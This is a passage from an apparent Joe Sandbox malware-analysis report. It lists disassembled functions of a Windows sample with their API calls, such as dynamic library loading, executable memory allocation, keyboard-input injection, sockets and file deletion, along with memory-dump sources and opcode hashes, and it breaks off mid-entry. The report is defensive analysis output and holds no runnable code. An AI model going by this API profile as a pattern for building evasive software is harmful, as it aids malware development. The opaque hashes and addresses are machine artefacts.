                                                    • API String ID: 2574300362-1355242751
                                                    • Opcode ID: f022c7b10ea794a584feb3c818acb994f471bfbb7a5520dfd72f412b6a1e88d2
                                                    • Instruction ID: b2836060923a5892dbeeb1ab6387556d526396b501520a907ebc295ee0e0e454
                                                    • Opcode Fuzzy Hash: f022c7b10ea794a584feb3c818acb994f471bfbb7a5520dfd72f412b6a1e88d2
                                                    • Instruction Fuzzy Hash: AAD017B1690713DFD730AF31D808A8676E7AF05755B12893AD8C6D6290EB70D8C0CB90
                                                    Function 00681072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,006812C1), ref: 00681080
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00681092
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: e6f0f674c2a4f6243685d9d7aaefddb7e7dbce33aaf5f9d8b64640dae77c1efc
                                                    • Instruction ID: 366590f867755cd42909b752956e4d5aab31a2ac1de8648a1f44e1cb2873e7d9
                                                    • Opcode Fuzzy Hash: e6f0f674c2a4f6243685d9d7aaefddb7e7dbce33aaf5f9d8b64640dae77c1efc
                                                    • Instruction Fuzzy Hash: 4AD01270510712DFD7305F35DC286A676EAAF05751B119E39A4C5DA250DBB0C4C0C750
                                                    Function 006793F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00679009,?,0068F910), ref: 00679403
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00679415
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 2574300362-199464113
                                                    • Opcode ID: 928f42dac3e3d96951fe012a8d4ac1396ee2c6218485400aab36eeb36fad573e
                                                    • Instruction ID: 0d4153efe2cb4e7cb2e99dc693ea71ea8729ee697e6c5902ef82452b951596d5
                                                    • Opcode Fuzzy Hash: 928f42dac3e3d96951fe012a8d4ac1396ee2c6218485400aab36eeb36fad573e
                                                    • Instruction Fuzzy Hash: CED01774650713DFD7209F71D90D68676E7AF06751B12C93AA4CAD6650EB70C8D0CB60
                                                    Function 00641B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LocalTime__swprintf
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 2070861257-2409531811
                                                    • Opcode ID: 81ee3edab24edc20f7d69a8718a1a3acfce3397b2637436f59e2bade913f07fe
                                                    • Instruction ID: 3b4ac26fca9209bd6a2f9ca9a62bb0756bf7176015d6d077028ca9b6f0702b66
                                                    • Opcode Fuzzy Hash: 81ee3edab24edc20f7d69a8718a1a3acfce3397b2637436f59e2bade913f07fe
                                                    • Instruction Fuzzy Hash: 35D012B180411CEACB449B909C548FA737EEB09311F101692B50699440F3349BC6DB25
                                                    Function 006576C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4ef2cd05f147fedc889e15fa147ef0967b083d26cee3ea4d175a4b81814ca5d
                                                    • Instruction ID: b5644a4e9538b99f48d22a4013f937d65cc0997756c8950b8cf4fb3a01b712ab
                                                    • Opcode Fuzzy Hash: e4ef2cd05f147fedc889e15fa147ef0967b083d26cee3ea4d175a4b81814ca5d
                                                    • Instruction Fuzzy Hash: A7C15A74A04216EFCB14CF94D884AAEB7B6FF48711F118599E806EB351D730EE85CBA0
                                                    Function 0067E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 0067E3D2
                                                    • CharLowerBuffW.USER32(?,?), ref: 0067E415
                                                      • Part of subcall function 0067DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0067DAD9
                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0067E615
                                                    • _memmove.LIBCMT ref: 0067E628
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                    • String ID:
                                                    • API String ID: 3659485706-0
                                                    • Opcode ID: 9a259499665618f994bf1168570db088fd9417d223d230455070588c4d5d2d19
                                                    • Instruction ID: 68be7bcaf874bb4df59ef1e4e028310496f5892f9645e4d574024c67f720e795
                                                    • Opcode Fuzzy Hash: 9a259499665618f994bf1168570db088fd9417d223d230455070588c4d5d2d19
                                                    • Instruction Fuzzy Hash: 71C16C71A083119FC754DF28C48095ABBE6FF89314F14896EF8999B351D732E94ACF82
                                                    Function 006783A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 006783D8
                                                    • CoUninitialize.OLE32 ref: 006783E3
                                                      • Part of subcall function 0065DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0065DAC5
                                                    • VariantInit.OLEAUT32(?), ref: 006783EE
                                                    • VariantClear.OLEAUT32(?), ref: 006786BF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: 7dc962ae9c40eb80c77b742d829efb9af279f2699ed2eec949ef8427a61b95c9
                                                    • Instruction ID: 40d43d7f1a0b8b37bbb1113682028e928faebb68c04e6a5d36dde674b2bf7e59
                                                    • Opcode Fuzzy Hash: 7dc962ae9c40eb80c77b742d829efb9af279f2699ed2eec949ef8427a61b95c9
                                                    • Instruction Fuzzy Hash: 28A15975244701AFDB54DF68C489A5AB7E6FF88314F18844CF99A9B3A2CB30ED04CB56
                                                    Function 00656DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: 92f0c30b55ef1d84254ea15b1f4e0bca34f0e2ca207f2dd793fcee6fe5e2c8a4
                                                    • Instruction ID: d67b993d1226316709047a3a4829178d84388077296dfe98df0df729d9f51a8c
                                                    • Opcode Fuzzy Hash: 92f0c30b55ef1d84254ea15b1f4e0bca34f0e2ca207f2dd793fcee6fe5e2c8a4
                                                    • Instruction Fuzzy Hash: 715118706487019BDB74AF65E881A6EB3E7AF08311F60881FFD46CB2D2DB309849DB15
                                                    Function 00689A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(0131D810,?), ref: 00689AD2
                                                    • ScreenToClient.USER32(00000002,00000002), ref: 00689B05
                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00689B72
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: 27c3224285c2343eac513060f3d14d2e8af3d121d1f7d03b772ae1b1e58a1e6a
                                                    • Instruction ID: adc5e217d1ee223c858844ab88dbffa5fa3d4282634d35c8938d35493cc236d5
                                                    • Opcode Fuzzy Hash: 27c3224285c2343eac513060f3d14d2e8af3d121d1f7d03b772ae1b1e58a1e6a
                                                    • Instruction Fuzzy Hash: 74510A74A00209AFCB14EF68D8859BE7BB6FF55324F148269F9159B390D770AD81CBA0
                                                    Function 00676CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00676CE4
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00676CF4
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00676D58
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00676D64
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                    • String ID:
                                                    • API String ID: 2214342067-0
                                                    • Opcode ID: 1940cc7c48d71d72cbb3621949fa3f4fae4f35959084d980f0ceaf8c83f59605
                                                    • Instruction ID: 555bdd8b9846ad8c792d0c4c8128bf68d50e5219143f3c664eee5bb6902fe7bb
                                                    • Opcode Fuzzy Hash: 1940cc7c48d71d72cbb3621949fa3f4fae4f35959084d980f0ceaf8c83f59605
                                                    • Instruction Fuzzy Hash: A8417F74780600AFEB64AF24DC86F6A76A7DF44B10F44805CFA599B2D3DA719D008B95
                                                    Function 0067672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0068F910), ref: 006767BA
                                                    • _strlen.LIBCMT ref: 006767EC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID:
                                                    • API String ID: 4218353326-0
                                                    • Opcode ID: 526a357c6475599a034385b0f7135b12a906c9c5b6d4a3fd26d2ff7be5fa8c57
                                                    • Instruction ID: a4d88cdc259c0335199ca4a2a7d870738c1d51080aaa697035e578213d56edbb
                                                    • Opcode Fuzzy Hash: 526a357c6475599a034385b0f7135b12a906c9c5b6d4a3fd26d2ff7be5fa8c57
                                                    • Instruction Fuzzy Hash: B741D631A40504AFCB58EB64DCC5EAFB3ABEF44314F148159F81A972D2EB309D00CB65
                                                    Function 0066BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0066BB09
                                                    • GetLastError.KERNEL32(?,00000000), ref: 0066BB2F
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0066BB54
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0066BB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 87d4b85f6e46d81f4636100dadbae90969cc7daee5f52ddf578252b961099951
                                                    • Instruction ID: e4162855236706522cd33c9e9b1a93eaeeb79c78e1f22b6ee4c383bb6dba30ea
                                                    • Opcode Fuzzy Hash: 87d4b85f6e46d81f4636100dadbae90969cc7daee5f52ddf578252b961099951
                                                    • Instruction Fuzzy Hash: 0B413A39640610DFCB14EF59C584A5EBBE3EF49310B098498EC4A9B7A2CB34FD41CBA5
                                                    Function 00688AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00688B4D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 3dc8ed3e1e8c4f03ca4939c70c7b7ab862b7b90250f790c5e453021f40c891eb
                                                    • Instruction ID: 67aef1804db00fed0a9b38acad25941244300a595da6eaf8328af9e21a1bcff4
                                                    • Opcode Fuzzy Hash: 3dc8ed3e1e8c4f03ca4939c70c7b7ab862b7b90250f790c5e453021f40c891eb
                                                    • Instruction Fuzzy Hash: 6831AEB4640204BFEB24AA58CC85FE937A7EB85320FA44716FA51D73E1DE30A9409755
                                                    Function 0068ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 0068AE1A
                                                    • GetWindowRect.USER32(?,?), ref: 0068AE90
                                                    • PtInRect.USER32(?,?,0068C304), ref: 0068AEA0
                                                    • MessageBeep.USER32(00000000), ref: 0068AF11
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: fcc42149266b7f4519a475d0b41614a49321e29f4f4d30b12442bb4dabd7acd5
                                                    • Instruction ID: b50365de8690ad219e53cef876f7fc1f261c296d423008f88d2036a8fb6792ac
                                                    • Opcode Fuzzy Hash: fcc42149266b7f4519a475d0b41614a49321e29f4f4d30b12442bb4dabd7acd5
                                                    • Instruction Fuzzy Hash: 76418170600115DFEB11EF98C888AA977F7FF88350F14866AE9149B351D730E842EF52
                                                    Function 00660FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00661037
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00661053
                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 006610B9
                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0066110B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: d75725ce2a0c10c29bd626e61c38c4671b834188b7ca5178ae6fc361053763b7
                                                    • Instruction ID: 6d090a0242d0d034c176f20c4641c41cb7096ff4b401b521f2903bfe8b33b498
                                                    • Opcode Fuzzy Hash: d75725ce2a0c10c29bd626e61c38c4671b834188b7ca5178ae6fc361053763b7
                                                    • Instruction Fuzzy Hash: 26315C30E40688AEFF308B668C05BFABBBBAB57310F0C431AE5805A2D1CB7549C19765
                                                    Function 00661121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00661176
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00661192
                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 006611F1
                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00661243
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 9d414fd8b52ac999f3f009f6083668bb01566a12df1e395b7df7d939fe222983
                                                    • Instruction ID: 89fff33a729e294e8f75793671f6ecc57562683871c368c9427b3f5fcdf45fb4
                                                    • Opcode Fuzzy Hash: 9d414fd8b52ac999f3f009f6083668bb01566a12df1e395b7df7d939fe222983
                                                    • Instruction Fuzzy Hash: 41312830A4064CAEFF308B65CC157FABBABAB8B310F0C431EE6909A6D1C3754A959755
                                                    Function 00636415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0063644B
                                                    • __isleadbyte_l.LIBCMT ref: 00636479
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006364A7
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 006364DD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 3c43d97fa15bfcd63b2c6995b16cff39ba9603b9baabb672e926a425c4a39d6b
                                                    • Instruction ID: 6ec45623a16b4e7552ac5830b57dc7a2ef7d6e1e79492e7363b2ece2fc2b5a7f
                                                    • Opcode Fuzzy Hash: 3c43d97fa15bfcd63b2c6995b16cff39ba9603b9baabb672e926a425c4a39d6b
                                                    • Instruction Fuzzy Hash: 9B31AF31A00256BFDB218F65CC45AAA7BE6FF41310F15C529F8558B292D731D851DB90
                                                    Function 00685175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00685189
                                                      • Part of subcall function 0066387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00663897
